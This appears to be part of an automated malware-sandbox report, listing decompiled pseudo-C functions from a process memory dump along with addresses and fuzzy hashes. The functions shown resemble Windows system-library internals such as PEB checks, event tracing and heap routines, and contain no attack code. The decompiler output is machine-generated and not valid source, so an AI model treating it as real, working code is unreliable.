0x046c10e1
0x046c10d1
0x046c10da
0x046c10da
0x046c10e9
0x046c10f5
0x046c10f5
0x046c10fe

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f146a5d26ac33401947c116107150ee2563197d1300758782aa42faf8e74b33
Instruction ID: 26e6668e750c7a0fd07da45526c1a476ad4258ef049b5e0b7b63a9981f1bce6b
Opcode Fuzzy Hash: 4f146a5d26ac33401947c116107150ee2563197d1300758782aa42faf8e74b33
Instruction Fuzzy Hash: 4801F172604741ABD710EB69C900AAAB7E9EB85314F04862DF88583392FE30E941CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0460B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0460B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04617D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04677016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0460b037
0x0460b039
0x0460b03b
0x0460b040
0x0465a60e
0x00000000
0x00000000
0x0465a61d
0x0460b04b
0x0460b04e
0x0465a627
0x0465a634
0x00000000
0x00000000
0x0465a641
0x0465a653
0x0465a643
0x0465a64c
0x0465a64c
0x0465a65b
0x00000000
0x00000000
0x00000000
0x0465a66c
0x0460b057
0x0460b057
0x0460b057
0x0460b046
0x0460b046
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 7378fa5a93f107270c8c348443fd94b04eac6090aa0133b114b102dbb7dc105c
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 9A0171713005849FD326CB9CC944F6777D8EB55B54F0980A1E916CB7A1F728FC41C625

Uniqueness

Uniqueness Score: -1.00%

Function 046AFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E046AFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x46ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0463FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04617D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0463B640(E04639AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x046afe3f
0x046afe3f
0x046afe4e
0x046afe58
0x046afe5d
0x046afe5f
0x046afe6a
0x046afe72
0x046afe75
0x046afe78
0x046afe83
0x046afe95
0x046afe85
0x046afe8e
0x046afe8e
0x046afea0
0x046afea1
0x046afea3
0x046afea8
0x046afebd

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e29ee8aa27230f08034f41549da9c3340d5a9a6047690324769bc0ece6153b
Instruction ID: 1bd70a9e0a96a49d8555793bdfa683e4335f3849397579529e9bf2d036496eae
Opcode Fuzzy Hash: 25e29ee8aa27230f08034f41549da9c3340d5a9a6047690324769bc0ece6153b
Instruction Fuzzy Hash: 60018471E00248ABDB14DFA9D845FAEB7B8EF44704F00406AB900AB391EA74A911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 046AFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E046AFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x46ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0463FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04617D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0463B640(E04639AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x046afec0
0x046afec0
0x046afecf
0x046afed9
0x046afede
0x046afee0
0x046afeeb
0x046afef3
0x046afef6
0x046afef9
0x046aff04
0x046aff16
0x046aff06
0x046aff0f
0x046aff0f
0x046aff21
0x046aff22
0x046aff24
0x046aff29
0x046aff3e

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab6912a05521430036fa4a6844d4260a08cbb7ff0dbdc9d76686c4ae9e1c478
Instruction ID: 4d71ec0261fccf282336b0211b94f7961362c342ad1b74c833f57f43135d653f
Opcode Fuzzy Hash: dab6912a05521430036fa4a6844d4260a08cbb7ff0dbdc9d76686c4ae9e1c478
Instruction Fuzzy Hash: A7018871E00648ABD714DB69D845FAEB7B8EF45704F00406AB9009B391FA74A911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 046C8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E046C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x46ed360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04617D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0463B640(E04639AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x046c8a62
0x046c8a71
0x046c8a79
0x046c8a82
0x046c8a85
0x046c8a89
0x046c8a8c
0x046c8a8f
0x046c8a92
0x046c8a95
0x046c8a9f
0x046c8ab1
0x046c8aa1
0x046c8aaa
0x046c8aaa
0x046c8abc
0x046c8abd
0x046c8abf
0x046c8ac4
0x046c8ada

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec93d0e28e01a6bc09c8f226f1fd926d144f8765517021461b439fb747f21a85
Instruction ID: c527036c8c43c165cc74bee702c1f8730ab85740bcc44f9ef852c953958ef49d
Opcode Fuzzy Hash: ec93d0e28e01a6bc09c8f226f1fd926d144f8765517021461b439fb747f21a85
Instruction Fuzzy Hash: F9012CB1E0021DAFDB00DFA9D9419AEB7B8EF49711F10405AF904E7351E634AD01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 046C8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E046C8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x46ed360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04617D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0463B640(E04639AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x046c8ed6
0x046c8ee5
0x046c8eed
0x046c8ef0
0x046c8efa
0x046c8f03
0x046c8f0c
0x046c8f15
0x046c8f24
0x046c8f27
0x046c8f31
0x046c8f43
0x046c8f33
0x046c8f3c
0x046c8f3c
0x046c8f4e
0x046c8f4f
0x046c8f51
0x046c8f56
0x046c8f69

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31cdf9316165c33028903e4cfedea6e83ae160ac80abcb9bb2732cce7aa3d01a
Instruction ID: c56bb1d84c1760b0e350d323f5952622356217a7bbe758305ca024a40fd01e10
Opcode Fuzzy Hash: 31cdf9316165c33028903e4cfedea6e83ae160ac80abcb9bb2732cce7aa3d01a
Instruction Fuzzy Hash: AD111E70E002599FDB04DFA9D541BAEB7F4FF48300F0442AAE518EB382E634A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 045FDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E045FDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E045FE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L045FE8B0(__ecx, _t14, 0xfff);
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x045fdb64
0x045fdb66
0x045fdb6b
0x045fdbaa
0x045fdb71
0x045fdb76
0x045fdb7a
0x045fdba3
0x045fdb7c
0x045fdb87
0x045fdb8b
0x04654fa1
0x04654fb3
0x04654fb8
0x045fdb91
0x045fdb96
0x045fdb98
0x045fdb98
0x045fdb8b
0x045fdb7a
0x045fdb9d
0x045fdba2

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 449a6d9e9c68281f2448ee3f681c57147f01a617aaf29f7ea477cbc41267de50
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 6CF0C8332115229BE3726E554C80B27A6A6AFC1A60F150435F7069B254D964A806BAD3

Uniqueness

Uniqueness Score: -1.00%

Function 045FB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04617D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04617D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04677016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x045fb1e8
0x045fb1ea
0x045fb1f3
0x04654a17
0x045fb1f9
0x045fb1f9
0x045fb1f9
0x045fb201
0x04654a21
0x04654a2e
0x00000000
0x00000000
0x04654a3b
0x04654a4d
0x04654a3d
0x04654a46
0x04654a46
0x04654a55
0x00000000
0x00000000
0x00000000
0x045fb20a
0x045fb20a
0x045fb20a
0x045fb20a

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: bc547d14df7572c63f898a72c5a21606c775268f9b82bfc850788fc57aa10d5a
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 2401D132200684DBD3229799DC04F6A7B98FF91798F0800A2FE15CB6B1FA78F840D219

Uniqueness

Uniqueness Score: -1.00%

Function 0468FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0468FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x46ed360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04617D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0463B640(E04639AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0468fe96
0x0468fe9e
0x0468fea1
0x0468fead
0x0468feb3
0x0468feb9
0x0468fec3
0x0468fed5
0x0468fec5
0x0468fece
0x0468fece
0x0468fee0
0x0468fee1
0x0468fee3
0x0468fee8
0x0468fefb

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d537e4111cb2046eee503b8dd4edc0a573c218542b71cf5a49ffe96ceba3a87
Instruction ID: c4b6dc959a2f9aaf41ab4277de913fae0ab1cc964b79d914c8b505b1a2c3192c
Opcode Fuzzy Hash: 0d537e4111cb2046eee503b8dd4edc0a573c218542b71cf5a49ffe96ceba3a87
Instruction Fuzzy Hash: B0016270E0024CEFCB14EFA8D545A6EB7F4EF04304F14415DA514DB382E635E901CB44

Uniqueness

Uniqueness Score: -1.00%

Function 046C8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E046C8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x46ed360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04617D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0463B640(E04639AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x046c8f6a
0x046c8f79
0x046c8f81
0x046c8f84
0x046c8f8b
0x046c8f91
0x046c8f94
0x046c8f9e
0x046c8fb0
0x046c8fa0
0x046c8fa9
0x046c8fa9
0x046c8fbb
0x046c8fbc
0x046c8fbe
0x046c8fc3
0x046c8fd6

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77be6c04062b30656c51a5ed36a0cf71890a379240c2b18ff6079c3fcc58689d
Instruction ID: b676108bf9992ba299644d6650371d9735091ecbcf8867d08fb977eed2d2a362
Opcode Fuzzy Hash: 77be6c04062b30656c51a5ed36a0cf71890a379240c2b18ff6079c3fcc58689d
Instruction Fuzzy Hash: 33014F74E0024CAFDB00EFA8D545AAEB7F4EF08300F10405AB915EB381FA74EA00DB98

Uniqueness

Uniqueness Score: -1.00%

Function 046B131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E046B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x46ed360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04617D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0463B640(E04639AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x046b131b
0x046b132a
0x046b1330
0x046b1336
0x046b133e
0x046b1341
0x046b1344
0x046b134f
0x046b1361
0x046b1351
0x046b135a
0x046b135a
0x046b136c
0x046b136d
0x046b136f
0x046b1374
0x046b1387

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0eacc24f25c35639cf057609cef0df21f986fcddab9621ad239672bd3ff56f6
Instruction ID: e3b1965e0d0952e2e09662e884669164f31b027d76f29ff98c9ad08615fd5c62
Opcode Fuzzy Hash: c0eacc24f25c35639cf057609cef0df21f986fcddab9621ad239672bd3ff56f6
Instruction Fuzzy Hash: 0E013C71E0524CAFDB04EFA9D555AAEB7F4FF09700F00405AB845EB391F674AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046B1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E046B1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x46ed360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04617D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0463B640(E04639AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x046b1608
0x046b1617
0x046b161d
0x046b1625
0x046b1628
0x046b162b
0x046b1636
0x046b1648
0x046b1638
0x046b1641
0x046b1641
0x046b1653
0x046b1654
0x046b1656
0x046b165b
0x046b166e

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd6703fccfa9bf5fc80d4919af50b96a8a0ba01cfe746a1169e4ee5322f65fd
Instruction ID: 23bba844f084c0f19844445f47829e51dc2901c33e80e70498312a247234242a
Opcode Fuzzy Hash: abd6703fccfa9bf5fc80d4919af50b96a8a0ba01cfe746a1169e4ee5322f65fd
Instruction Fuzzy Hash: 3AF06D71E00248EFDB04EFA9D415AAEB7F4EF19300F04406AA915EB391FA34A900CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0461C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0461C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0461C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x45d11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E046C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0461c577
0x0461c57d
0x0461c581
0x0461c5b5
0x0461c5b9
0x0461c5ce
0x0461c5ce
0x0461c5ca
0x00000000
0x0461c5ca
0x0461c5c4
0x0461c5c8
0x00000000
0x00000000
0x00000000
0x0461c5ad
0x00000000
0x0461c5af

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907d2f50f4ce79592211b639bd56cc0f47a07830f3a916bbeaff52f161dc673b
Instruction ID: e770885bf2e0f357a265818ecb0bf529d13ea9d0bf6fe730d9ee7b6aff0f47b2
Opcode Fuzzy Hash: 907d2f50f4ce79592211b639bd56cc0f47a07830f3a916bbeaff52f161dc673b
Instruction Fuzzy Hash: 91F024B29916908FE731CB18C004B2A7BD99B14378F4CC46BD40783331F2A0FCA0C244

Uniqueness

Uniqueness Score: -1.00%

Function 046B2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E046B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E046AFD22(__ecx);
				_t19 =  *0x46e849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x46e8748; // 0x0
					if(__eflags <= 0) {
						E046B1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x46e8724 & 0x00000004;
							if(( *0x46e8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x46e8724; // 0x0
					return E046A8DF1(__ebx, 0xc0000374, 0x46e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x046b2076
0x046b2078
0x046b207d
0x046b2083
0x046b20a4
0x046b20aa
0x046b20ac
0x046b20b7
0x046b20ba
0x046b20bc
0x046b20c9
0x046b20c9
0x046b20d0
0x046b20d2
0x00000000
0x046b20d2
0x046b20be
0x046b20c3
0x046b20c5
0x046b20c7
0x00000000
0x00000000
0x046b20c7
0x046b20bc
0x046b20d4
0x046b2085
0x046b2085
0x046b20a3
0x046b20a3

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db1638aa4ee7aacd5449e9b7d2f35ffb37b38c060e44d700dc99a3763e33a97
Instruction ID: 78b0519ce3859fa3817cfc22f81f0be7775157c62f77c66e9cc5e86960627a27
Opcode Fuzzy Hash: 9db1638aa4ee7aacd5449e9b7d2f35ffb37b38c060e44d700dc99a3763e33a97
Instruction Fuzzy Hash: 3AF0A7664159958AEF367F2661292E53BD0D755158F0914CAD8D01B300F53DACC3CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 046C8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E046C8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x46ed360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04617D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0463B640(E04639AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x046c8d34
0x046c8d43
0x046c8d4b
0x046c8d4e
0x046c8d52
